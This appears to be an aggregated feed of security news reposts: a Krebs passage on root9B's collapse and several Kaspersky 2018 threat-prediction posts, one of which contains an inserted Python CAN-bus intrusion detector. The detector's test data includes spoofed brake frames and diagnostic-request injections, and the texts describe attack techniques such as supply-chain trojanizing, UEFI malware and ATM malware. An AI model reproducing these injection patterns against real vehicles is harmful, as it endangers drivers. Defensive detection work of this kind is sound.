The report, released May 12, 2015, claimed root9B had uncovered plans by an infamous Russian hacking group to target several banks. The company said the thwarted operation was orchestrated by Fancy Bear/Sofacy, a so-called “advanced persistent threat” (APT) hacking group known for launching sophisticated phishing attacks aimed at infiltrating some of the world’s biggest corporations.  root9B released its Q1 2015 earnings two days later, reporting record revenues.

On May 20, 2015, KrebsOnSecurity published a rather visceral dissection of that root9B report: Security Firm Redefines APT; African Phishing Threat. The story highlighted the thinness of the report’s claims, pointing to multiple contradictory findings by other security firms which suggested the company had merely detected several new phishing domains being erected by a comparatively low-skilled African phishing gang that was well-known to investigators and U.S. banks.

In mid-June 2015, an anonymous researcher who’d apparently done a rather detailed investigation into root9B’s finances said the company was “a worthless reverse-merger created by insiders with [a] long history of penny-stock wipeouts, fraud allegations, and disaster.”

That report, published by the crowd-sourced financial market research site SeekingAlpha.com, sought to debunk claims by root9B that it possessed “proprietary” cybersecurity hardware and software, noting that the company mainly acts as a reseller of a training module produced by a third party.

root9B’s stock price never recovered from those reports, and began a slow but steady decline after mid-2015. In Dec. 2016, root9B Technologies announced a reverse split of its issued and outstanding common stock, saying it would be moving to the NASDAQ market with the trading symbol RTNB and a new name — root9B Holdings. On January 18, 2017, a reshuffled root9B rang the market opening bell at NASDAQ, and got a bounce when it said it’d been awarded a five-year training contract to support the U.S. Defense Department.

The company’s founders remained upbeat even into mid-2017. On June 6, 2017 it announced that Michael Hayden, the four-star general who until recently served as director of the U.S. National Security Agency, had joined the company’s board.

On June 23, 2017, root9B issued a press release reminding everyone that the company had remained #1 on the Cybersecurity 500 for the 6th consecutive quarter. The Cybersecurity 500, by the way, rates cybersecurity firms based on their “branding and marketing.”

Nobody ever accused root9B of bad marketing. But all the press releases in the world couldn’t hide the fact that the company had never turned a profit. It lost more than $18.3 million in 2016, more than doubling an $8.03 million loss in 2015.

Since August 2017, shares of the company’s stock have fallen more than 90 percent. On Sept. 28, 2017, all of root9B’s assets were acquired by venture investment firm Tracker Capital Management LLC, and then sold at auction.

On Nov. 13, root9B Holdings issued a press release saying NASDAQ was de-listing the firm on Nov. 15 and that it was ceasing operations at the end of this year. The statement seemed to emphasize there was nothing left for the firm’s creditors to pick over.

“With the absence of any operating assets remaining after the Foreclosure, the Company will cease any and all operations effective, December 31, 2017,” the (final?) root9B press release concludes.

The demise of root9B resonates loudly with that of Norse Corp., another flashy, imploded cybersecurity startup that banked heavily on attracting and touting top talent, while managing to produce very little that was useful to or actionable by anybody.

Companies like these are a reminder that your success or failure in business as in life is directly tied to what you produce — not what you promise or represent. There is no shortcut to knowledge, success or mastery, and this goes for infosec students as well as active practitioners of the craft. Focus on consistently producing quality, unique content and/or services that are of real value to others, and the rest will take care of itself.











http://ift.tt/2z45og1 Source: http://ift.tt/TKsn16



Threat Predictions for Cryptocurrencies in 2018


The landscape in 2017

Today, cryptocurrency is no longer only for computer geeks and IT pros. It’s starting to affect people’s daily life more than they realize. At the same time, it is fast becoming an attractive target for cybercriminals. Some cyberthreats have been inherited from e-payments, such as changing the destination wallet address during a transaction and stealing an electronic wallet, among other things. However, cryptocurrencies have opened up new and unprecedented ways to monetize malicious activity.

In 2017, the main global threat to users was ransomware: in order to recover files and data encrypted by attackers, victims were required to pay a ransom in cryptocurrency. In the first eight months of 2017, Kaspersky Lab products protected 1.65 million users from malicious cryptocurrency miners, and by the end of the year we expect this number to exceed two million. In addition, in 2017 we saw the return of Bitcoin stealers after a few years in the shadows.

What can we expect in 2018?

With the ongoing rise in the number, adoption and market value of cryptocurrencies, they will not only remain an appealing target for cybercriminals, but will also drive the use of more advanced techniques and tools to acquire more of them. Cybercriminals will quickly turn their attention to the most profitable money-making schemes. Therefore, 2018 is likely to be the year of malicious web-miners.

  1. Ransomware attacks will force users to buy cryptocurrency. Cybercriminals will continue to demand ransoms in cryptocurrency, because of the unregulated and almost anonymous cryptocurrency market: there is no need to share any data with anyone, no one will block the address, no one will catch you, and there is little chance of being tracked. At the same time, further simplification of the monetization process will lead to the wider dissemination of encryptors.
  2. Targeted attacks with miners. We expect the development of targeted attacks on companies for the purpose of installing miners. While ransomware provides a potentially large but one-off income, miners will result in a lower but longer-lasting income. Next year we will see what tips the scales.
  3. Rise of miners will continue and involve new actors. Next year mining will continue to spread across the globe, attracting more people. The involvement of new miners will depend on their ability to get access to a free and stable source of electricity. Thus, we will see the rise of ‘insider miners’: more employees of government organizations will start mining on publicly owned computers, and more employees of manufacturing companies will start using company-owned facilities.
  4. Web-mining. Web-mining is a cryptocurrency mining technique that runs directly in the browser via a special script placed on a web page. Attackers have already proved it is easy to upload such a script to a compromised website and engage visitors’ computers in mining and, as a result, add more coins to the criminals’ wallets. Next year web-mining will dramatically affect the nature of the Internet, leading to new ways of website monetization. One of these will replace advertising: websites will offer to permanently remove a mining script if the user subscribes to paid content. Alternatively, different kinds of entertainment, such as movies, will be offered for free in exchange for your mining. Another method is based on a website security check system – Captcha verification to distinguish humans from bots will be replaced with web-mining modes, and it will no longer matter whether a visitor is a bot or a human, since either will ‘pay’ with mining.
  5. Fall of ICO (Initial Coin Offering). ICO means crowdfunding via cryptocurrencies. 2017 saw tremendous growth of this approach; with more than $3 billion collected by different projects, most related in some way to blockchain. Next year we should expect ICO-hysteria to decline, with a series of failures (inability to create the ICO-funded product), and more careful selection of investment projects. A number of unsuccessful ICO projects may negatively affect the exchange rate of cryptocurrencies (Bitcoin, Ethereum etc.), which in 2017 experienced unprecedented growth. Thus we will see a decrease in the absolute number of phishing and hacking attacks targeting ICO, smart contracts and wallets.

http://ift.tt/2ALz7HG Source: https://securelist.com



Threat Predictions for Financial Services and Fraud in 2018

The landscape in 2017

In 2017 we’ve seen fraud attacks in financial services become increasingly account-centric. Customer data is a key enabler for large-scale fraud attacks and the frequency of data breaches among other successful attack types has provided cybercriminals with valuable sources of personal information to use in account takeover or false identity attacks. These account-centric attacks can result in many other losses, including that of further customer data and trust, so mitigation is as important as ever for businesses and financial services customers alike.

What can we expect in 2018?

2018 will be a year of innovation in financial services as the pace of change in this space continues to accelerate. As more channels and new financial service offerings emerge, threats will diversify. Financial services will need to focus on omni-channel fraud prevention to successfully identify more fraud crossing from online accounts to newer channels. Newer successful payment types will see more attack attempts as their profitability for attack increases.

  1. Real-time payment challenges. Increasing demand from consumers for real-time and cross-border financial transactions results in pressure to analyse risk more quickly. Consumer expectations for friction-free payments make this task even more challenging. Financial services will need to rethink and make ‘Know Your Customer’ processes more effective. Machine learning and eventually AI-based solutions will also be key in meeting the need for quicker fraud and risk detection.
  2. Social engineering attacks. Financial services will need to stay focused on tried and tested attack techniques. In spite of more sophisticated emergent threats, social engineering and phishing continue to be some of the simplest and most profitable attacks – exploiting the human element as the weakest link. Customer and employee education should continue to improve awareness of the latest attacks and scams.
  3. Mobile threats. According to the latest Kaspersky Cybersecurity Index, ever more online activity now takes place on mobile. For example, 35 per cent of people now use their smartphone for online banking and 29 per cent for online payment systems (up from 22 per cent and 19 per cent respectively in the previous year). These mobile-first consumers will increasingly be prime targets for fraud. Cybercriminals will use previously successful and new malware families to steal user banking credentials in creative ways. In 2017 we saw a modified version of the Svpeng malware family. In 2018, other families of mobile malware will re-surface to target banking credentials with new features. Identifying and removing mobile malware early is essential for financial services institutions to stop these attacks.
  4. Data breaches. Data breaches will continue to make the headlines in 2018 and the secondary impact on financial institutions will be felt through fake account set ups and account take-over attacks. Data breaches, although harder to commit than individual fraud attacks against customers, are hugely profitable to criminals thanks to the high volume of customer data exposed in one hit. Financial services should regularly test their defences and use solutions to detect any suspicious access at the earliest stages.
  5. Cryptocurrency targets. More financial institutions will explore the application of cryptocurrencies, making attacks on these currencies a key target for cybercriminals. We already saw the occurrence of mining malware increasing in 2017 and more attempts to exploit these currencies will be seen in 2018. Solutions capable of detecting the latest malware families should be used as well as combining the latest threat intelligence into prevention strategies. [See Threat Predictions for Cryptocurrencies for further information on this threat.]
  6. Account takeover. More secure physical payments through chip technology and other Point of Sale improvements have shifted fraud online in the past decade. Now, as online payment security improves through tokenisation, biometric technology and more, fraudsters are shifting to account takeover attacks. Industry estimates suggest fraud of this type will run into billions of dollars as fraudsters pursue this highly profitable attack vector. Financial services will need to rethink digital identities and use innovative solutions to be sure that customers are who they say they are, every time.
  7. Pressure to innovate. More and more businesses will venture into payment solutions and open banking offerings in 2018. Innovation will be key to incumbent financial service firms seeking a competitive advantage over an increasing number of competitors. But understanding the regulatory complications can be challenging enough, never mind evaluating the potential for attack on new channels. These new offerings will be targets for fraudsters upon release and any new solution not designed with security at the core will find itself an easy target for cybercriminals.
  8. Fraud-as-a-Service. International underground communication amongst cybercriminals means that knowledge is shared quickly and attacks can spread globally even faster. Fraud services are offered on the dark web, from bots and phishing translation services to remote access tools. Less experienced cybercriminals purchase and use these tools, meaning more attempted attacks for financial services to block. Sharing knowledge across departments as well as looking to threat intelligence services will be key in mitigation.

  9. ATM attacks. ATMs will continue to attract the attention of many cybercriminals. In 2017, Kaspersky Lab researchers uncovered, among other things, attacks on ATM systems that involved new malware, remote and fileless operations, and an ATM-targeting malware called ‘Cutlet Maker’ that was being sold openly on the DarkNet market for a few thousand dollars with a step-by-step user guide. Kaspersky Lab has published a report on future ATM attack scenarios targeting ATM authentication systems.

http://ift.tt/2AKfm3f Source: https://securelist.com



Threat Predictions for Connected Health in 2018

The landscape in 2017

In 2017, Kaspersky Lab research revealed the extent to which medical information and patient data stored within the connected healthcare infrastructure is left unprotected and accessible online for any motivated cybercriminal to discover. For example, we found open access to around 1,500 devices used to process patient images. In addition, we found that a significant amount of connected medical software and web applications contains vulnerabilities for which published exploits exist.

This risk is heightened because cyber-villains increasingly understand the value of health information, its ready availability, and the willingness of medical facilities to pay to get it back.

What can we expect in 2018?

The threats to healthcare will increase as ever more connected devices and vulnerable web applications are deployed by healthcare facilities. Connected healthcare is driven by a number of factors, including a need for resource and cost efficiency; a growing requirement for remote, home-based care for chronic conditions like diabetes and ageing populations; consumer desire for a healthy lifestyle; and a recognition that data-sharing and patient monitoring between organizations can significantly enhance the quality and effectiveness of medical care.

The threats facing these trends over the coming 12 months include the following:

  1. Attacks targeting medical equipment with the aim of extortion, malicious disruption or worse will rise. The volume of specialist medical equipment connected to computer networks is increasing. Many such networks are private, but one external Internet connection can be enough for attackers to breach and spread their malware through the ‘closed’ network. Targeting equipment can disrupt care and prove fatal – so the likelihood of the medical facility paying up is very high.
  2. There will also be a rise in the number of targeted attacks focused on stealing data. The amount of medical information and patient data held and processed by connected healthcare systems grows daily. Such data is immensely valuable on the black market and can also be used for blackmail and extortion. It’s not just other criminals who could be interested: the victim’s employer or insurance company might want to know as it could impact premiums or even job security.
  3. There will be more incidents related to ransomware attacks against healthcare facilities. These will involve data encryption as well as device blocking: connected medical equipment is often expensive and sometimes life-critical, which makes it a prime target for attack and extortion.
  4. The concept of a clearly-defined corporate perimeter will continue to ‘erode’ in medical institutions, as ever more workstations, servers, mobile devices and equipment go online. This will give criminals more opportunities to gain access to medical information and networks. Keeping defenses and endpoints secure will be a growing challenge for healthcare security teams as every new device will open up a new entry point into the corporate infrastructure.
  5. Sensitive and confidential data transmitted between connected ‘wearables’, including implants, and healthcare professionals will be a growing target for attack as the use of such devices in medical diagnosis, treatment and preventative care continues to increase. Pacemakers and insulin pumps are prime examples.
  6. National and regional healthcare information systems that share unencrypted or otherwise insecure patient data between local practitioners, hospitals, clinics and other facilities will be a growing target for attackers looking to intercept data beyond the protection of corporate firewalls. The same applies to data shared between medical facilities and health insurance companies.
  7. The growing use by consumers of connected health and fitness gadgets will offer attackers access to a vast volume of personal data that is generally minimally protected. The popularity of health-conscious, connected lifestyles means that fitness bracelets, trackers, smart watches, etc. will carry and transmit ever larger quantities of personal data with only basic security – and cybercriminals won’t hesitate to exploit this.
  8. Disruptive attacks – whether in the form of denial of service attacks or through ‘ransomware’ that simply destroys data (such as WannaCry) – are a growing threat to increasingly digital health care facilities. The ever increasing number of workstations, electronic records management and digital business processes that underpin any modern organization broadens the attack surface for cybercriminals. In healthcare, they take on an extra urgency, as any disruption can in real terms become a matter of life or death.

Last, but not least, emerging technologies such as connected artificial limbs, implants for smart physiological enhancements, embedded augmented reality etc., designed both to address disabilities and create better, stronger, fitter human beings, will offer innovative attackers new opportunities for malicious action and harm unless they have security integrated from the very first moment of design.

http://ift.tt/2yEMuYU Source: https://securelist.com



Threat Predictions for Automotive in 2018


The landscape in 2017

Modern cars are no longer just electro-mechanical vehicles. With each generation, they become more connected and incorporate more intelligent technologies to make them smarter, more efficient, comfortable and safe. The connected-car market is growing at a five-year compound annual growth rate of 45% — 10 times faster than the car market overall.

In some regions (e.g. the EU or Russia) two-way connected systems (eCall, ERA-GLONASS) are extensively implemented for safety and monitoring purposes; and all major auto manufacturers now offer services that allow users to interact remotely with their car via a web interface or a mobile app.

Remote fault diagnostics, telematics and connected infotainment significantly enhance driver safety and enjoyment, but they also present new challenges for the automotive sector as they turn vehicles into prime targets for cyberattack. The growing risk of a vehicle’s systems being infiltrated or having its safety, privacy and financial elements violated requires manufacturers to understand and apply IT security. Recent years have seen a number of examples highlighting the vulnerability of connected cars.

What can we expect in 2018?

Gartner estimates that there will be a quarter of a billion connected cars on the roads by 2020. Others suggest that by then around 98% of cars will be connected to the Internet. The threats we face now, and those we expect to face over the coming year, should not be seen in isolation – they are part of this continuum – the more vehicles are connected, in more ways, the greater the surface and opportunities for attack.

The threats facing the automotive sector over the coming 12 months include the following:

  1. Vulnerabilities introduced through lack of manufacturer attention or expertise, combined with competitive pressures. The range of connected mobility services being launched will continue to rise, as will the number of suppliers developing and delivering them. This ever-growing supply (and the likelihood of products/suppliers being of variable quality), coupled with a fiercely competitive marketplace, could lead to security shortcuts or gaps that provide an easy way in for attackers.
  2. Vulnerabilities introduced through growing product and service complexity. Manufacturers serving the automotive sector are increasingly focused on delivering multiple interconnected services to customers. Every link is a potential point of weakness that attackers will be quick to seize on. An attacker only needs to find one insecure opening, whether that is a peripheral such as a phone’s Bluetooth link or a music download system, and from there they may be able to take control of safety-critical electrical components like the brakes or engine, and wreak havoc.
  3. No software code is 100% bug free – and where there are bugs there can be exploits. Vehicles already carry more than 100 million lines of code. This in itself represents a massive attack surface for cybercriminals. And as more connected elements are installed into vehicles, the volume of code will soar, increasing the risk of bugs. Some automotive manufacturers, including Tesla, have introduced specific bug bounty programs to address this.
  4. Further, with software being written by different developers, installed by different suppliers, and often reporting back to different management platforms, no one player will have visibility of, let alone control over, all of a vehicle’s source code. This could make it easier for attackers to bypass detection.
  5. Apps mean happiness for cybercriminals. There are a growing number of smartphone apps, many introduced by car manufacturers, which owners can download to remotely unlock their cars, check the engine status or find its location. Researchers have already demonstrated proof of concepts of how such apps can be compromised. It will not be long before Trojanized apps appear that inject malware direct into the heart of an unsuspecting victim’s vehicle.
  6. With connected components increasingly introduced by companies more familiar with hardware than software, there is a growing risk that the need for constant updates could be overlooked. This could make it harder, if not impossible for known issues to be patched remotely. Vehicle recalls take time and cost money and in the meantime many drivers will be left exposed.
  7. Connected vehicles will generate and process ever more data – about the vehicle, but also about journeys and even personal data on the occupants – this will be of growing appeal to attackers looking to sell the data on the black market or to use it for extortion and blackmail. Car manufacturers are already under pressure from marketing companies eager to get legitimate access to passenger and journey data for real time location-based advertising.
  8. Fortunately, growing awareness and understanding of security threats will result in the first cyber-secure devices for remote diagnostic and telematics data appearing on the market.
  9. Further, lawmakers will come up with requirements and recommendations for making cybersecurity a mandatory part of all connected vehicles.
  10. Last but not least, alongside existing safety certification there will be new organizations set up that are responsible for cybersecurity certification. They will use clearly defined standards to assess connected vehicles in terms of their resistance to cyberattacks.

Recommended action

Addressing these risks involves integrating security as standard, by design, focused on different parts of the connected car ecosystem. Defensive software solutions could be installed locally on individual electrical components — for instance, the brakes — to reinforce them against attacks. Next, software can protect the vehicle’s internal network as a whole by examining all network communications, flagging any changes in standard in-vehicle network behaviour and stopping attacks from advancing in the network. Overarching this, a solution needs to protect all components that are connected externally to the Internet. Cloud security services can detect and correct threats before they reach the vehicle. They can also send the vehicle over-the-air updates and intelligence in real time. All of this should be supported with rigorous and consistent industry standards.
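The second layer above, a monitor that learns what normal in-vehicle network traffic looks like and flags deviations, can be sketched as follows. This is an added example, not Kaspersky code or any vendor's product: it assumes a simplified CAN frame log of (timestamp, 11-bit arbitration ID, payload), constructs a baseline of two periodic signals with made-up IDs and payloads, and then flags an unknown diagnostic ID, a truncated payload and a burst of spoofed frames arriving far faster than the learned period.

```python
"""In-vehicle CAN traffic monitor: learn a baseline, then flag deviations.

Added example (not Kaspersky code). It assumes a simplified frame log of
(timestamp in seconds, 11-bit arbitration ID, payload bytes); reading a real
bus through a CAN interface is out of scope here.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Frame:
    ts: float       # seconds since start of capture
    can_id: int     # 11-bit arbitration ID
    data: bytes     # payload, 0-8 bytes


@dataclass
class Profile:
    period: Optional[float]  # mean inter-arrival time learned in baseline (None if seen once)
    dlc: int                 # payload length seen in baseline


Alert = Tuple[float, int, str, str]  # (ts, can_id, kind, detail)


def learn_baseline(frames: List[Frame]) -> Dict[int, Profile]:
    """Learn, per arbitration ID, the usual message period and payload length."""
    last_seen: Dict[int, float] = {}
    gaps: Dict[int, List[float]] = defaultdict(list)
    dlcs: Dict[int, int] = {}
    for f in sorted(frames, key=lambda fr: fr.ts):
        if f.can_id in last_seen:
            gaps[f.can_id].append(f.ts - last_seen[f.can_id])
        last_seen[f.can_id] = f.ts
        dlcs.setdefault(f.can_id, len(f.data))
    return {
        cid: Profile(period=(sum(gaps[cid]) / len(gaps[cid])) if gaps[cid] else None, dlc=dlc)
        for cid, dlc in dlcs.items()
    }


def detect(frames: List[Frame], profiles: Dict[int, Profile], tol: float = 0.5) -> List[Alert]:
    """Flag frames that deviate from the learned baseline.

    kind "unknown_id": arbitration ID never seen in baseline (e.g. diagnostics on a
                       bus that carries none while driving)
    kind "length":     payload length differs from baseline
    kind "timing":     a periodic ID arrives far faster (injection/flood) or far slower
                       (suppression) than its learned period, by more than `tol`
    """
    alerts: List[Alert] = []
    last_seen: Dict[int, float] = {}
    for f in sorted(frames, key=lambda fr: fr.ts):
        p = profiles.get(f.can_id)
        if p is None:
            alerts.append((f.ts, f.can_id, "unknown_id", "arbitration ID not in baseline"))
            continue
        if len(f.data) != p.dlc:
            alerts.append((f.ts, f.can_id, "length",
                           f"payload length {len(f.data)} != baseline {p.dlc}"))
        if p.period is not None and f.can_id in last_seen:
            gap = f.ts - last_seen[f.can_id]
            if gap < p.period * (1 - tol) or gap > p.period * (1 + tol):
                alerts.append((f.ts, f.can_id, "timing",
                               f"gap {gap * 1000:.1f} ms vs learned {p.period * 1000:.1f} ms"))
        last_seen[f.can_id] = f.ts
    return alerts


def periodic(can_id: int, period_ms: int, count: int, data: bytes) -> List[Frame]:
    """Constructed helper: `count` frames of one ID at a fixed period."""
    return [Frame(i * period_ms / 1000.0, can_id, data) for i in range(count)]


# Constructed sample traffic (IDs and payloads are made up, except 0x7DF, which is the
# standard OBD-II functional diagnostic request ID): one second of two periodic signals.
BASELINE: List[Frame] = (
    periodic(0x0C9, 10, 100, b"\x12\x34\x00\x00\x00\x00\x00\x00")  # "engine data" every 10 ms
    + periodic(0x1A1, 50, 20, b"\x00\x01")                         # "brake status" every 50 ms
)

# Same legitimate traffic plus three anomalies a network-level monitor should catch.
ATTACK: List[Frame] = list(BASELINE)
ATTACK[30] = Frame(ATTACK[30].ts, 0x0C9, b"\x12\x34\x00\x00")              # truncated payload at t=0.30 s
ATTACK.append(Frame(0.300, 0x7DF, b"\x02\x01\x0C\x00\x00\x00\x00\x00"))     # diagnostic request mid-drive
ATTACK += [Frame(0.501 + 0.002 * i, 0x1A1, b"\x00\x00") for i in range(5)]  # spoofed brake frames, 2 ms apart


if __name__ == "__main__":
    for ts, cid, kind, detail in detect(ATTACK, learn_baseline(BASELINE)):
        print(f"t={ts:.3f}s id=0x{cid:03X} {kind}: {detail}")
```

A production monitor would also learn payload value ranges and counter/checksum fields, but the per-ID period check alone already catches the classic injection pattern, where spoofed frames must out-race the legitimate ECU's own messages.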

http://ift.tt/2ALz7aE Source: https://securelist.com



Kaspersky Security Bulletin: Threat Predictions for 2018

Introduction

As hard as it is to believe, it’s once again time for our APT Predictions. Looking back at a year like 2017 brings the internal conflict of being a security researcher into full view: on the one hand, each new event is an exciting new research avenue for us, as what were once theoretical problems find palpable expression in reality. This allows us to understand the actual attack surface and attacker tactics and to further hone our hunting and detection to address new attacks. On the other hand, as people with a heightened concern for the security posture of users at large, each event is a bigger catastrophe. Rather than consider each new breach as yet another example of the same, we see the compounding cumulative insecurity facing users, e-commerce, financial, and governmental institutions alike.

As we stated last year, rather than thinly-veiled vendor pitching, our predictions are an attempt to bring to bear our research throughout the year in the form of trends likely to peak in the coming year.

Our record – did we get it right?

As a snapshot scorecard of our performance last year, these are some of our 2017 predictions and some examples where relevant:

Espionage and APTs:

Financial Attacks:

Ransomware:

Industrial threats:

  • The ICS Armageddon hasn’t come yet (and we are happy to be wrong on that); however, we’ve seen ICS come under attack from Industroyer – http://ift.tt/2ra3Xoj

IoT:

Information Warfare:

What can we expect in 2018?

  1. More supply chain attacks. Kaspersky Lab’s Global Research and Analysis Team tracks over 100 APT (advanced persistent threat) groups and operations. Some of these are incredibly sophisticated and possess wide arsenals that include zero-day exploits, fileless attack tools, and combine traditional hacking attacks with handovers to more sophisticated teams that handle the exfiltration part. We have often seen cases in which advanced threat actors have attempted to breach a certain target over a long period of time and kept failing at it. This was either due to the fact that the target was using strong internet security suites, had educated their employees not to fall victim to social engineering, or consciously followed the Australian DSD TOP35 mitigation strategies for APT attacks. In general, an actor that is considered both advanced and persistent won’t give up that easily; they’ll continue poking the defenses until they find a way in.

    When everything else fails, they are likely to take a step back and re-evaluate the situation. During such a re-evaluation, threat actors can decide a supply chain attack can be more effective than trying to break into their target directly. Even a target whose networks employ the world’s best defenses is likely using software from a third party. The third party might be an easier target and can be leveraged to attack the better protected original target enterprise.

    During 2017, we have seen several such cases, including but not limited to:

    1. Shadowpad
    2. CCleaner
    3. ExPetr / NotPetya

    These attacks can be extremely difficult to identify or mitigate. For instance, in the case of Shadowpad, the attackers succeeded in Trojanizing a number of packages from Netsarang that were widely used around the world, in banks, large enterprises, and other industry verticals. The difference between the clean and Trojanized packages can be dauntingly difficult to notice – in many cases it’s the command and control (C&C) traffic that gives them away.

    For CCleaner, it was estimated that over 2 million computers received the infected update, making it one of the biggest attacks of 2017. Analysis of the malicious CCleaner code allowed us to correlate it with a couple of other backdoors that are known to have been used in the past by APT groups from the ‘Axiom umbrella’, such as APT17 also known as Aurora. This proves the now extended lengths to which APT groups are willing to go in order to accomplish their objectives.

    Our assessment is that the number of supply chain attacks at the moment is probably much higher than we realize, but these have yet to be noticed or exposed. During 2018, we expect to see more supply chain attacks, both in terms of discoveries and of actual attacks. Trojanizing specialized software used in specific regions and verticals will become a move akin to waterholing strategically chosen sites in order to reach specific swaths of victims, and will thus prove irresistible to certain types of attackers.

  2. More high-end mobile malware. In August 2016, CitizenLab and Lookout published their analysis of the discovery of a sophisticated mobile espionage platform named Pegasus. Pegasus, a so-called ‘lawful interception’ software suite, is sold to governments and other entities by an Israeli company called NSO Group. When combined with zero-days capable of remotely bypassing a modern mobile operating system’s security defenses, such as those of iOS, this is a highly potent system against which there is little defense. In April 2017, Google published its analysis of the Android version of the Pegasus spyware, which it called Chrysaor. In addition to ‘lawful surveillance’ spyware such as Pegasus and Chrysaor, many other APT groups have developed their own mobile malware implants.

    Due to the fact that iOS is an operating system locked down from introspection, there is very little that a user can do to check if their phone is infected. Somehow, despite the greater state of vulnerability of Android, the situation is better on Android where products such as Kaspersky AntiVirus for Android are available to ascertain the integrity of a device.

    Our assessment is that the total amount of mobile malware existing in the wild is likely higher than currently reported, due to shortcomings in telemetry that make these implants more difficult to spot and eradicate. We estimate that in 2018 more high-end APT malware for mobile will be discovered, as a result of both an increase in the attacks and improvements in the security technologies designed to catch them.

  3. More BeEF-like compromises with web profiling. Due to a combination of increased interest and better security and mitigation technologies being deployed by default in operating systems, the prices of zero-day exploits have skyrocketed through 2016 and 2017. For instance, the latest Zerodium payout chart lists up to $1,500,000 for a complete iPhone (iOS) Remote jailbreak with persistence attack, which is another way of saying ‘a remote infection without any interaction from the user’.

    The incredible prices that some government customers have most certainly chosen to pay for these exploits mean there is increasing attention paid towards protecting these exploits from accidental disclosure. This translates into the implementation of a more solid reconnaissance phase before delivering the actual attack components. The reconnaissance phase can, for instance, emphasize the identification of the exact versions of the browser used by the target, their operating system, plugins and other third-party software. Armed with this knowledge, the threat actor can fine-tune their exploit delivery to a less sensitive ‘1-day’ or ‘N-day’ exploit, instead of using the crown jewels.

    These profiling techniques have been fairly consistent with APT groups like Turla and Sofacy, as well as Newsbeef (a.k.a. Newscaster, Ajax hacking team, or ‘Charming Kitten’), but also other APT groups known for their custom profiling frameworks, such as the prolific Scanbox. Taking the prevalence of these frameworks into account in combination with a surging need to protect expensive tools, we estimate the usage of profiling toolkits such as ‘BeEF’ will increase in 2018 with more groups adopting either public frameworks or developing their own.

  4. Sophisticated UEFI and BIOS attacks. The Unified Extensible Firmware Interface (UEFI) is a software interface which serves as the intermediary between the firmware and the operating system on modern PCs. Established in 2005 by an alliance of leading software and hardware developers, Intel most notable amongst them, it’s now quickly superseding the legacy BIOS standard. This was achieved thanks to a number of advanced features that BIOS lacks: for example, the ability to install and run executables, networking and Internet capabilities, cryptography, CPU-independent architecture and drivers, etc. The very advanced capabilities that make UEFI such an attractive platform also open the way to new vulnerabilities that didn’t exist in the age of the more rigid BIOS. For example, the ability to run custom executable modules makes it possible to create malware that would be launched by UEFI directly before any anti-malware solution – or, indeed, the OS itself – had a chance to start.

    The fact that commercial-grade UEFI malware exists has been known since 2015, when the Hacking Team UEFI modules were discovered. With that in mind, it is perhaps surprising that no significant UEFI malware has been found since, a fact that we attribute to the difficulty of detecting it in a reliable way. We estimate that in 2018 we will see the discovery of more UEFI-based malware.

  5. Destructive attacks continue. Beginning in November 2016, Kaspersky Lab observed a new wave of wiper attacks directed at multiple targets in the Middle East. The malware used in the new attacks was a variant of the infamous Shamoon worm that targeted Saudi Aramco and Rasgas back in 2012. Dormant for four years, one of the most mysterious wipers in history has returned. Also known as Disttrack, Shamoon is a highly destructive malware family that effectively wipes the victim machine. A group known as the ‘Cutting Sword of Justice’ took credit for the Saudi Aramco attack by posting a Pastebin message on the day of the attack (back in 2012), and justified the attack as a measure against the Saudi monarchy.

    The Shamoon 2.0 attacks seen in November 2016 targeted organizations in various critical and economic sectors in Saudi Arabia. Just like the previous variant, the Shamoon 2.0 wiper aims for the mass destruction of systems inside compromised organizations. While investigating the Shamoon 2.0 attacks, Kaspersky Lab also discovered a previously unknown wiper malware that appears to be targeting organizations in Saudi Arabia. We’ve called this new wiper StoneDrill and have been able to link it with a high degree of confidence to the Newsbeef APT group.

    In addition to Shamoon and StoneDrill, 2017 has been a tough year in terms of destructive attacks. The ExPetr/NotPetya attack, which was initially considered to be ransomware, turned out to be a cleverly camouflaged wiper as well. ExPetr was followed by other waves of ‘ransomware’ attacks in which there is little chance for the victims to recover their data; all cleverly masked ‘wipers as ransomware’. One of the lesser known facts about ‘wipers as ransomware’ is perhaps that a wave of such attacks was observed in 2016 from the CloudAtlas APT, which leveraged what appeared to be ‘wipers as ransomware’ against financial institutions in Russia.

    In 2018, we estimate that destructive attacks will continue to rise, leveraging their status as the most visible type of cyberwarfare.

  6. More subversion of cryptography. In March 2017, IoT encryption scheme proposals developed by the NSA came into question with Simon and Speck variant ISO approvals being both withdrawn and delayed a second time.

    In August 2016, Juniper Networks announced the discovery of two mysterious backdoors in their NetScreen firewalls. Perhaps the most interesting of the two was an extremely subtle change of the constants used for the Dual_EC random number generator, which would allow a knowledgeable attacker to decrypt VPN traffic from NetScreen devices. The original Dual_EC algorithm was designed by the NSA and pushed through NIST. Back in 2013, a Reuters report suggested that NSA paid RSA $10 million to put the vulnerable algorithm in their products as a means of subverting encryption. Even if the theoretical possibility of a backdoor was identified as early as 2007, several companies (including Juniper) continued to use it with a different set of constants, which would make it theoretically secure. It appears that this different set of constants made some APT actor unhappy enough to merit hacking into Juniper and changing the constants to a set that they could control and leverage to decrypt VPN connections.

    These attempts haven’t gone unnoticed. In September 2017, an international group of cryptography experts forced the NSA to back down on two new encryption algorithms which the organization was hoping to standardize.

    In October 2017, news broke about a flaw in a cryptographic library used by Infineon in their hardware chips for the generation of RSA primes. While the flaw appears to have been unintentional, it leaves open the question of how secure the underlying encryption technologies used in our everyday life really are, from smart cards and wireless networks to encrypted web traffic. In 2018, we predict that more severe cryptographic vulnerabilities will be found and (hopefully) patched, be they in the standards themselves or in specific implementations.

  7. Identity in e-commerce comes into crisis. The past few years have been punctuated by increasingly catastrophic large-scale breaches of personally identifiable information (PII). Latest among these is the Equifax breach reportedly affecting 145.5 million Americans. While many have grown desensitized to the weight of these breaches, it’s important to understand that the release of PII at scale endangers a fundamental pillar of e-commerce and the bureaucratic convenience of adopting the Internet for important paperwork. Sure, fraud and identity theft have been problems for a long time, but what happens when the fundamental identifying information is so widely proliferated that it’s simply not reliable at all? Commerce and governmental institutions (particularly in the United States) will be faced with a choice between scaling back the modern comforts of adopting the Internet for operations or doubling down on the adoption of other multi-factor solutions. Perhaps alternatives that have so far proved resilient, like ApplePay, will come into vogue as de facto means of ensuring identity and transactions, but in the meantime we may see a slowdown in the critical role of the Internet for modernizing tedious bureaucratic processes and cutting operational costs.

